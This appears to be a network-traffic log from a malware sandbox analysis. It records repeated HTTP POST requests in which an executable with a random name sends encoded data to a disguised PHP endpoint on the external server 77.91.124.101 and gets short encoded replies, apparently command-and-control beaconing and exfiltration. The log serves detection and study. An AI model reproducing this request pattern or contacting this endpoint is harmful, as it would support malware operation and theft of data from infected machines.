Nov 21, 2023 04:47:28.330218077 CET	157	OUT	Data Raw: 52 5a 5d 5a 5b 53 5f 5a 5d 57 55 57 55 59 57 50 50 5a 58 49 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ]Z[S_Z]WUWUYWPPZXIVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);)^?!* 86\4\)( !'==0V!-89+?;8&G''^)
Nov 21, 2023 04:47:28.534405947 CET	158	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49743	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:47.785492897 CET	260	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:47.982127905 CET	260	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:47.982362986 CET	263	OUT	Data Raw: 57 59 5d 5b 5b 5c 5f 5b 5d 57 55 57 55 5d 57 56 50 52 58 43 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY][[\_[]WUWU]WVPRXCVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$82+]&) /2["1?0:W&..S'#&-]=(78&G''^)+
Nov 21, 2023 04:47:48.186844110 CET	263	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	77.91.124.101	80	192.168.2.5	49743	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:47.785492897 CET	260	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:47.982127905 CET	260	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:47.982362986 CET	263	OUT	Data Raw: 57 59 5d 5b 5b 5c 5f 5b 5d 57 55 57 55 5d 57 56 50 52 58 43 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WY][[\_[]WUWU]WVPRXCVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$82+]&) /2["1?0:W&..S'#&-]=(78&G''^)+
Nov 21, 2023 04:47:48.186844110 CET	263	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49744	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:48.504776955 CET	264	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:48.706068993 CET	264	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:48.706363916 CET	267	OUT	Data Raw: 57 50 5d 5c 5b 53 5a 51 5d 57 55 57 55 56 57 54 50 5a 58 49 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]\[SZQ]WUWUVWTPZXIVUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^1<1>3'_/5 95?3P'[>' *:86?Z$/&G''^)
Nov 21, 2023 04:47:48.910502911 CET	267	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	77.91.124.101	80	192.168.2.5	49744	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:48.504776955 CET	264	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:48.706068993 CET	264	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:48.706363916 CET	267	OUT	Data Raw: 57 50 5d 5c 5b 53 5a 51 5d 57 55 57 55 56 57 54 50 5a 58 49 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]\[SZQ]WUWUVWTPZXIVUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^1<1>3'_/5 95?3P'[>' *:86?Z$/&G''^)
Nov 21, 2023 04:47:48.910502911 CET	267	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49745	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:49.116487980 CET	268	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:49.315845013 CET	269	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:49.316200972 CET	270	OUT	Data Raw: 57 5b 58 5d 5e 5d 5a 5e 5d 57 55 57 55 57 57 50 50 52 58 48 56 5e 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[X]^]Z^]WUWUWWPPRXHV^WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+.+9>33[8$ 5]?9'="'V>T-;(?;]8&G''^)
Nov 21, 2023 04:47:49.521035910 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:49 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 04 25 2f 0d 05 23 20 2b 56 3c 04 26 09 2d 10 00 40 3c 0a 21 11 26 04 28 5a 24 17 2a 0b 2b 59 38 5c 33 17 2c 1c 34 26 30 59 2a 1a 21 5a 0c 1d 25 03 21 3b 30 0f 28 07 23 04 3c 2d 06 5f 25 1f 01 58 28 00 05 16 23 33 01 5a 32 30 3f 09 2e 2f 2a 07 2e 28 3d 19 32 3c 2e 58 34 17 23 5f 0c 14 27 50 22 32 23 5b 23 0e 00 1c 22 34 2b 04 23 24 06 0a 24 13 24 55 31 3b 21 59 3c 16 0a 52 27 37 0a 51 33 29 20 0c 25 39 23 55 28 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !%/# +V<&-@<!&(Z$+Y8\3,4&0Y!Z%!;0(#<-_%X(#3Z20?./.(=2<.X4#_'P"2#[#"4+#$$$U1;!Y<R'7Q3) %9#U(&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	77.91.124.101	80	192.168.2.5	49745	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:49.116487980 CET	268	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:49.315845013 CET	269	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:49.316200972 CET	270	OUT	Data Raw: 57 5b 58 5d 5e 5d 5a 5e 5d 57 55 57 55 57 57 50 50 52 58 48 56 5e 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[X]^]Z^]WUWUWWPPRXHV^WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+.+9>33[8$ 5]?9'="'V>T-;(?;]8&G''^)
Nov 21, 2023 04:47:49.521035910 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:49 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 04 25 2f 0d 05 23 20 2b 56 3c 04 26 09 2d 10 00 40 3c 0a 21 11 26 04 28 5a 24 17 2a 0b 2b 59 38 5c 33 17 2c 1c 34 26 30 59 2a 1a 21 5a 0c 1d 25 03 21 3b 30 0f 28 07 23 04 3c 2d 06 5f 25 1f 01 58 28 00 05 16 23 33 01 5a 32 30 3f 09 2e 2f 2a 07 2e 28 3d 19 32 3c 2e 58 34 17 23 5f 0c 14 27 50 22 32 23 5b 23 0e 00 1c 22 34 2b 04 23 24 06 0a 24 13 24 55 31 3b 21 59 3c 16 0a 52 27 37 0a 51 33 29 20 0c 25 39 23 55 28 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !%/# +V<&-@<!&(Z$+Y8\3,4&0Y!Z%!;0(#<-_%X(#3Z20?./.(=2<.X4#_'P"2#[#"4+#$$$U1;!Y<R'7Q3) %9#U(&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	77.91.124.101	80	192.168.2.5	49746	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:49.238934040 CET	269	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:49.436714888 CET	270	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:49.436917067 CET	273	OUT	Data Raw: 52 5c 58 5f 5e 5e 5a 51 5d 57 55 57 55 57 57 5a 50 5c 58 45 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\X_^^ZQ]WUWUWWZP\XEVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==+8&V=(;'*75?509& :-(</\8.&G''^)
Nov 21, 2023 04:47:49.643173933 CET	274	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49746	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:49.238934040 CET	269	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:49.436714888 CET	270	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:49.436917067 CET	273	OUT	Data Raw: 52 5c 58 5f 5e 5e 5a 51 5d 57 55 57 55 57 57 5a 50 5c 58 45 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\X_^^ZQ]WUWUWWZP\XEVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==+8&V=(;'*75?509& :-(</\8.&G''^)
Nov 21, 2023 04:47:49.643173933 CET	274	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	77.91.124.101	80	192.168.2.5	49747	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:49.956535101 CET	275	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:50.159806013 CET	275	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:50.160186052 CET	278	OUT	Data Raw: 57 58 58 5d 5b 59 5a 50 5d 57 55 57 55 58 57 54 50 5b 58 48 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX][YZP]WUWUXWTP[XHVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+5+]2W=3[/7&Z :><0>'.S0>R.;*]+?7\/>&G''^)?
Nov 21, 2023 04:47:50.364954948 CET	278	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49747	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:49.956535101 CET	275	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:50.159806013 CET	275	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:50.160186052 CET	278	OUT	Data Raw: 57 58 58 5d 5b 59 5a 50 5d 57 55 57 55 58 57 54 50 5b 58 48 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX][YZP]WUWUXWTP[XHVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+5+]2W=3[/7&Z :><0>'.S0>R.;*]+?7\/>&G''^)?
Nov 21, 2023 04:47:50.364954948 CET	278	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49749	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:50.690767050 CET	279	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:50.889306068 CET	279	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:50.889525890 CET	282	OUT	Data Raw: 52 5d 58 5a 5e 5d 5f 5d 5d 57 55 57 55 5c 57 57 50 5f 58 41 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]XZ^]_]]WUWU\WWP_XAVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)85X+))86 :+&3=!$ =-+<X8>&G''^)/
Nov 21, 2023 04:47:51.094454050 CET	287	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	77.91.124.101	80	192.168.2.5	49749	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:50.690767050 CET	279	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:50.889306068 CET	279	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:50.889525890 CET	282	OUT	Data Raw: 52 5d 58 5a 5e 5d 5f 5d 5d 57 55 57 55 5c 57 57 50 5f 58 41 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]XZ^]_]]WUWU\WWP_XAVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)85X+))86 :+&3=!$ =-+<X8>&G''^)/
Nov 21, 2023 04:47:51.094454050 CET	287	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49750	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:51.409622908 CET	287	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:51.606362104 CET	314	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:51.606614113 CET	317	OUT	Data Raw: 57 5f 5d 5e 5e 58 5a 59 5d 57 55 57 55 5e 57 52 50 5e 58 46 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W_]^^XZY]WUWU^WRP^XFVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)(Y?*37\,%79+-&-$2V:)?? ,&G''^)#
